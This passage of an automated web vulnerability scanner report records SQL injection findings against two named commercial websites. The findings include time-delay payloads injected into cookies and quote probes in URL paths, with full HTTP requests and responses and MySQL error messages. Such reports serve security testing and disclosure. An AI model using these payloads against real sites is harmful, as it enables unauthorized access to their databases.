Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 921


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...

2.44. http://www.hunton.com/aboutus/uniGC.aspx [EventingStatus cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The EventingStatus cookie appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the EventingStatus cookie. The application took 60845 milliseconds to respond to the request, compared with 28128 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1waitfor%20delay'0%3a0%3a20'--; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:33:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

2.45. http://www.hunton.com/professionals/uniGC.aspx [EventingStatus cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The EventingStatus cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the EventingStatus cookie. The application took 39995 milliseconds to respond to the request, compared with 2810 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1',0,0)waitfor%20delay'0%3a0%3a20'--; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:30:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=3dc8e81d-f541-4b27-b4dc-f2ceacc23a78; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

2.46. http://www.hunton.com/professionals/uniGC.aspx [ZoneId cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The ZoneId cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the ZoneId cookie. The application took 33219 milliseconds to respond to the request, compared with 2810 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7',0)waitfor%20delay'0%3a0%3a20'--; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:27:28 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=6d620d41-9034-454a-8d58-923aa7816ed0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

2.47. http://www.hunton.com/professionals/uniGC.aspx [__utma cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie. The application took 63956 milliseconds to respond to the request, compared with 9107 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1'waitfor%20delay'0%3a0%3a20'--; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:53:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

2.48. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC; __utma=94003201.1070057693.1303147760.1303147760.1304727090.2; __utmb=94003201.1.10.1304727090; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:36 GMT
Connection: Keep-Alive
Content-Length: 27688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico''' at line 1)<br>
...[SNIP]...

2.49. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing'/images/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 27717
Date: Fri, 06 May 2011 19:12:53 GMT
X-Varnish: 1128246861
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing''/images/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29453
Date: Fri, 06 May 2011 19:12:54 GMT
X-Varnish: 1128247139
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

2.50. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images'/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 27716
Date: Fri, 06 May 2011 19:12:59 GMT
X-Varnish: 1128247898
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images''/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29451
Date: Fri, 06 May 2011 19:13:00 GMT
X-Varnish: 1128248119
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

2.51. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:13:05 GMT
Connection: Keep-Alive
Content-Length: 27752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/images/powerline_bg.png''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:13:06 GMT
Connection: Keep-Alive
Content-Length: 29451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

2.52. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
